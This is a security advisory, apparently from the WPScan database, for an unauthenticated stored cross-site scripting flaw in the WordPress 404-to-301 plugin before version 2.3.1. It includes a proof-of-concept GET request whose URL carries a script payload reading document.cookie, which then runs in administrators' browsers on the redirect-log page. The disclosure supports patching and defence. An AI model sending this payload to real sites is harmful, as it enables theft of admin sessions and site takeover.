404 to 301 <= 2.3.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
There is a stored XSS in the 404-to-301 WP plugin < 2.3.1. Unauthenticated users can visit a specially crafted URL and the redirect path will be logged to the database. The redirection source is stored unescaped in the database, thus it is served as-is and evaluated in the browsers of logged-in admins when they check the redirection logs on http://wordpress/wp-admin/admin.php?page=i4t3-logs. Affected versions are <2.3.1.

Proof of Concept
A similar requests must be sent to the vulnerable server. Make sure to request a page serving a 404, ie by requesting a post with an unexisting post ID.

GET /?p=99999999999999999929"><script>alert(document.cookie)</script> HTTP/1.1
Host: wordpress
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close

Affects

Plugin 404-to-301
fixed in version 2.3.1

References

URL https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23
URL https://github.com/joel-james/404-to-301/commit/7a4e2798eca79828c1611988289e06b6d9c18b61
URL https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_404_to_301_wordpress_plugin.html
URL http://seclists.org/fulldisclosure/2016/Nov/46

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ldionmarcil
Submitter Website https://keybase.io/ldionmarcil
Submitter Twitter https://twitter.com/ldionmarcil
Views 308
Verified No
WPVDB ID 8611

Timeline

Publicly Published 2016-08-27 (3 months ago)
Added 2016-08-29 (3 months ago)
Last Updated 2016-11-08 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.